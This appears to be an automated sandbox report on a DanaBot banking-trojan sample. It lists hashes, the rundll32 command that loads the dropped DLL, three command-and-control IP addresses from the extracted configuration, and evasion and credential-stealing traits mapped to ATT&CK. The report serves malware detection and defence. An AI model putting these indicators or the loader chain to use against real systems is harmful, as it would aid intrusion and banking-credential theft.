Loading ...

Play interactive tourEdit tour

Windows Analysis Report Coy2GAiARw

Overview

General Information

Sample Name:Coy2GAiARw (renamed file extension from none to exe)
Analysis ID:502747
MD5:5ad64bb7be7914ad793ae5ccb98a571e
SHA1:60aeca403754af25ff307050496a70eabe706a8a
SHA256:18ae9ea1c1d71b33777c8772248580f17a2bcecf1aa0e8f71ec15d4b33d5253b
Tags:32DanaBotexetrojan
Infos:

Most interesting Screenshot:

Detection

DanaBot
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DanaBot stealer dll
Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • Coy2GAiARw.exe (PID: 6816 cmdline: 'C:\Users\user\Desktop\Coy2GAiARw.exe' MD5: 5AD64BB7BE7914AD793AE5CCB98A571E)
    • rundll32.exe (PID: 6852 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: DanaBot

{"C2 list": ["192.210.222.88:443", "192.236.147.159:443", "192.119.110.73:443"], "Embedded Hash": "F4711E27D559B4AEB1A081A1EB0AC465"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\COY2GA~1.EXE.dllJoeSecurity_DanaBot_stealer_dll_1Yara detected DanaBot stealer dllJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmpJoeSecurity_DanaBot_stealer_dll_1Yara detected DanaBot stealer dllJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmpMalware Configuration Extractor: DanaBot {"C2 list": ["192.210.222.88:443", "192.236.147.159:443", "192.119.110.73:443"], "Embedded Hash": "F4711E27D559B4AEB1A081A1EB0AC465"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Coy2GAiARw.exeVirustotal: Detection: 42%Perma Link
      Yara detected DanaBot stealer dllShow sources
      Source: Yara matchFile source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED
      Machine Learning detection for sampleShow sources
      Source: Coy2GAiARw.exeJoe Sandbox ML: detected
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F5C80 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_004F5C80
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F29AC CryptDestroyKey,0_2_004F29AC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F6334 CryptReleaseContext,0_2_004F6334
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2C93 CryptReleaseContext,0_2_004F2C93
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2D48 CryptDestroyKey,0_2_004F2D48
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2F04 CryptReleaseContext,0_2_004F2F04
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_0086120C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00865ED0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00865ED0

      Compliance:

      barindex
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeUnpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack
      Source: Coy2GAiARw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Binary string: 9C:\sil-dafunotepon bolinebihaw98\gekib.pdb`0P source: Coy2GAiARw.exe
      Source: Binary string: C:\sil-dafunotepon bolinebihaw98\gekib.pdb source: Coy2GAiARw.exe
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00409568 FindFirstFileW,FindClose,0_2_00409568
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414924 FindFirstFileW,FindClose,0_2_00414924
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00408F9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_00408F9C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007791EC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_007791EC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007797B8 FindFirstFileW,FindClose,0_2_007797B8

      Networking:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.119.110.73 443Jump to behavior
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: 192.210.222.88:443
      Source: Malware configuration extractorURLs: 192.236.147.159:443
      Source: Malware configuration extractorURLs: 192.119.110.73:443
      Source: Joe Sandbox ViewASN Name: HOSTWINDSUS HOSTWINDSUS
      Source: Joe Sandbox ViewIP Address: 192.119.110.73 192.119.110.73
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: Coy2GAiARw.exe, 00000000.00000002.316475191.00000000008CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected DanaBot stealer dllShow sources
      Source: Yara matchFile source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_0086120C
      Source: Coy2GAiARw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C0_2_0086120C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 00406CF4 appears 50 times
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 00776F44 appears 46 times
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 0040BE8C appears 41 times
      Source: Coy2GAiARw.exe, 00000000.00000003.315793591.0000000002658000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Coy2GAiARw.exe
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: Coy2GAiARw.exeVirustotal: Detection: 42%
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Coy2GAiARw.exe 'C:\Users\user\Desktop\Coy2GAiARw.exe'
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXEJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile created: C:\Users\user\Desktop\COY2GA~1.EXE.dllJump to behavior
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/1@0/1
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414A38 GetDiskFreeSpaceW,0_2_00414A38
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Coy2GAiARw.exeStatic file information: File size 1159680 > 1048576
      Source: Coy2GAiARw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: 9C:\sil-dafunotepon bolinebihaw98\gekib.pdb`0P source: Coy2GAiARw.exe
      Source: Binary string: C:\sil-dafunotepon bolinebihaw98\gekib.pdb source: Coy2GAiARw.exe

      Data Obfuscation:

      barindex
      Detected unpacking (overwrites its own PE header)Show sources
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeUnpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack
      Detected unpacking (changes PE section rights)Show sources
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeUnpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nusavu:ER;.pudipuv:ER;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004FC000 push 004FC0DEh; ret 0_2_004FC0D6
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004FC474 push 004FC511h; ret 0_2_004FC509
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040B108 push 0040B18Bh; ret 0_2_0040B183
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00416B84 push 00416C1Dh; ret 0_2_00416C15
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F9C24 push 004F9CD6h; ret 0_2_004F9CCE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00411524 push 0041155Ch; ret 0_2_00411554
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004146CC push ecx; mov dword ptr [esp], ecx0_2_004146D0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086C0C4 push 004FC511h; ret 0_2_0086C159
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0078491C push ecx; mov dword ptr [esp], ecx0_2_00784920
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0077B358 push 0040B18Bh; ret 0_2_0077B3D3
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086BC50 push 004FC0DEh; ret 0_2_0086BD26
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00786DD4 push 00416C1Dh; ret 0_2_00786E65
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00869E74 push 004F9CD6h; ret 0_2_00869F1E
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00781774 push 0041155Ch; ret 0_2_007817A4
      Source: Coy2GAiARw.exeStatic PE information: section name: .nusavu
      Source: Coy2GAiARw.exeStatic PE information: section name: .pudipuv
      Source: COY2GA~1.EXE.dll.0.drStatic PE information: section name: .didata
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: initial sampleStatic PE information: section name: .text entropy: 7.99111772368
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile created: C:\Users\user\Desktop\COY2GA~1.EXE.dllJump to dropped file
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2053Jump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040AFF4 GetSystemInfo,0_2_0040AFF4
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00409568 FindFirstFileW,FindClose,0_2_00409568
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414924 FindFirstFileW,FindClose,0_2_00414924
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00408F9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_00408F9C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007791EC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_007791EC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007797B8 FindFirstFileW,FindClose,0_2_007797B8
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0077092B mov eax, dword ptr fs:[00000030h]0_2_0077092B
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00770D90 mov eax, dword ptr fs:[00000030h]0_2_00770D90

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.119.110.73 443Jump to behavior
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_004096A0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_00416278
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_0041622C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00408B40
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_00419540
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: EnumSystemLocalesW,0_2_0041977C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_007798F0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: EnumSystemLocalesW,0_2_007899CC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_007864C8
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00778D74
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00778D90
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00404C04 cpuid 0_2_00404C04
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004161DC GetLocalTime,0_2_004161DC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040B008 GetVersion,0_2_0040B008

      Stealing of Sensitive Information:

      barindex
      Yara detected DanaBot stealer dllShow sources
      Source: Yara matchFile source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED

      Remote Access Functionality:

      barindex
      Yara detected DanaBot stealer dllShow sources
      Source: Yara matchFile source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Application Shimming1Process Injection12Masquerading1Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Process Injection12LSASS MemoryProcess Discovery1Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerApplication Window Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsSystem Information Discovery26SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing22Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Coy2GAiARw.exe42%VirustotalBrowse
      Coy2GAiARw.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.3.Coy2GAiARw.exe.9c0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      192.210.222.88:4430%Avira URL Cloudsafe
      192.119.110.73:4430%Avira URL Cloudsafe
      192.236.147.159:4430%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      192.210.222.88:443true
      • Avira URL Cloud: safe
      unknown
      192.119.110.73:443true
      • Avira URL Cloud: safe
      unknown
      192.236.147.159:443true
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      192.119.110.73
      unknownUnited States
      54290HOSTWINDSUStrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:502747
      Start date:14.10.2021
      Start time:11:50:13
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 13s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Coy2GAiARw (renamed file extension from none to exe)
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:22
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal96.troj.evad.winEXE@3/1@0/1
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 21.5% (good quality ratio 20.4%)
      • Quality average: 78.1%
      • Quality standard deviation: 26.1%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 52.251.79.25, 20.54.110.249, 40.112.88.60, 13.107.4.50, 20.199.120.182, 23.52.67.112, 23.52.67.98, 95.100.216.89, 104.94.90.32, 104.127.115.201, 20.199.120.85
      • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, b1ns.au-msedge.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Not all processes where analyzed, report is missing behavior information

      Simulations

      Behavior and APIs

      TimeTypeDescription
      11:51:22API Interceptor1x Sleep call for process: rundll32.exe modified

      Joe Sandbox View / Context

      IPs

